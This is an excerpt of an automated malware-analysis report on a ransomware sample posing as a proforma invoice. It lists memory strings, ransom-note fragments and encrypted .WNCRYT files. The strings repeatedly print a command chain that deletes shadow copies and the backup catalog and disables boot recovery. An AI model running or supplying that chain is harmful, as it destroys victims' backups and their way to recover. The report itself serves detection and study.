            Source: @WanaDecryptor@.exe, 00000041.00000003.2422461367.0000000000506000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6UX7Qrunascmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet!
            Source: @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: u/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe, 00000041.00000002.2423688644.0000000000513000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6UX7Qrunascmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet!
            Source: @WanaDecryptor@.exe, 00000041.00000002.2423688644.0000000000549000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9UWindows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33W
            Source: @WanaDecryptor@.exe, 00000041.00000003.2422461367.0000000000527000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe, 00000041.00000003.2422461367.0000000000527000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9UWindows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet33W
            Source: cmd.exe, 0000004D.00000002.2456061422.00000000033A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\cmd.exe/cvssadmindeleteshadows/all/quiet&wmicshadowcopydelete&bcdedit/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenabledno&wbadmindeletecatalog-quiet
            Source: cmd.exe, 0000004D.00000002.2456061422.00000000033A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows\SysWOW64\cmd.exe" c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: cmd.exe, 0000004D.00000002.2454989413.0000000002D30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\SysWOW64\cmd.exeWinSta0\Default
            Source: cmd.exe, 0000004D.00000002.2455296023.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet
            Source: cmd.exe, 0000004D.00000002.2455296023.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\SysWOW64\cmd.exeWinSta0\DefaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows=8f
            Source: cmd.exe, 0000004D.00000002.2455296023.0000000002DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: cmd.exe, 0000004D.00000002.2455296023.0000000002DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe.10.drBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            Source: @WanaDecryptor@.exe.10.drBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File moved: C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.pdf
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File deleted: C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.pdf
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File moved: C:\Users\user\Desktop\NIRMEKAMZH.mp3
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File deleted: C:\Users\user\Desktop\NIRMEKAMZH.mp3
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File moved: C:\Users\user\Desktop\HMPPSXQPQV\VWDFPKGDUF.xlsx
            Source: C:\Program Files\7-Zip\7zG.exe File created: C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip entropy: 7.99931242378
            Source: C:\Program Files\7-Zip\7zG.exe File created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe entropy: 7.99547094116
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js.WNCRYT entropy: 7.99043912244
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js.WNCRYT entropy: 7.99990849273
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRYT entropy: 7.9995679726
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js.WNCRYT entropy: 7.9960800471
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRYT entropy: 7.99802962828
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js.WNCRYT entropy: 7.99590606653
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.WNCRYT entropy: 7.99882085293
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.WNCRYT entropy: 7.99940273021
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.WNCRYT entropy: 7.99962939996Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.WNCRYT entropy: 7.99700668457Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRYT entropy: 7.99757883385Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.WNCRYT entropy: 7.99694154247Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRYT entropy: 7.99980432681Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js.WNCRYT entropy: 7.99787015795Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRYT entropy: 7.99996173264Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\4tiHI4cTzqiixje34Lb3KTOm39Q[1].js.WNCRYT entropy: 7.99671244277Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRYT entropy: 7.99949809295Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[1].png.WNCRYT entropy: 7.9910278599Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[2].png.WNCRYT entropy: 7.99088540788Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRYT entropy: 7.99037158838Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[2].png.WNCRYT entropy: 7.99141359559Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[3].png.WNCRYT entropy: 7.99304008674Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRYT entropy: 7.99990658852Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].png.WNCRYT entropy: 7.99069753968Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].svg.WNCRYT entropy: 7.99842666446Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRYT entropy: 7.99436172655Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[1].svg.WNCRYT entropy: 7.99823264997Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRYT entropy: 7.99986298769Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[2].png.WNCRYT entropy: 7.99234076161Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRYT entropy: 7.99175047349Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRYT entropy: 7.99993842295Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\y1DovzXWmZOic4QXLXu-qBKEMRM.br[1].js.WNCRYT entropy: 7.99733463819Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRYT entropy: 7.99978863472Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99989735433Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRYT entropy: 7.99947194807Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99990451898Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRYT entropy: 7.99811760784Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRYT entropy: 7.99967272227Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRYT entropy: 7.99829537033Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410582984954725.txt.WNCRYT entropy: 7.99833518582Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRYT entropy: 7.99938505594Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410583284348700.txt.WNCRYT entropy: 7.99851139262Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRYT entropy: 7.99960343992Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584556659274.txt.WNCRYT entropy: 7.9983023214Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410584609702615.txt.WNCRYT entropy: 7.99847071519Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRYT entropy: 7.99986148704Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410586637015569.txt.WNCRYT entropy: 7.99828812156Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498762936491601.txt.WNCRYT entropy: 7.99836051251Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763235716446.txt.WNCRYT entropy: 7.99848327859Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763707955679.txt.WNCRYT entropy: 7.99832759783Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99973269348Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db.WNCRYT entropy: 7.99919248056Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db.WNCRYT entropy: 7.99921736722Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99131035969Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.991931964Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.99340694608Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT entropy: 7.99268727442Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT entropy: 7.99096314975Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0DD3376E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99948616661Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.WNCRYT entropy: 7.99797071147Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.WNCRYT entropy: 7.99751823991Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRYT entropy: 7.99861469809Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99980718063Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRYT entropy: 7.9913189825Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99993977368Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99991549121Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99982084665Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99632635728Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99986205221Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99984031204Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99981121368Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.9998289363Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99995472416Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99382500932Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js.WNCRYT entropy: 7.99959486929Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRYT entropy: 7.9995646137Jump to dropped file
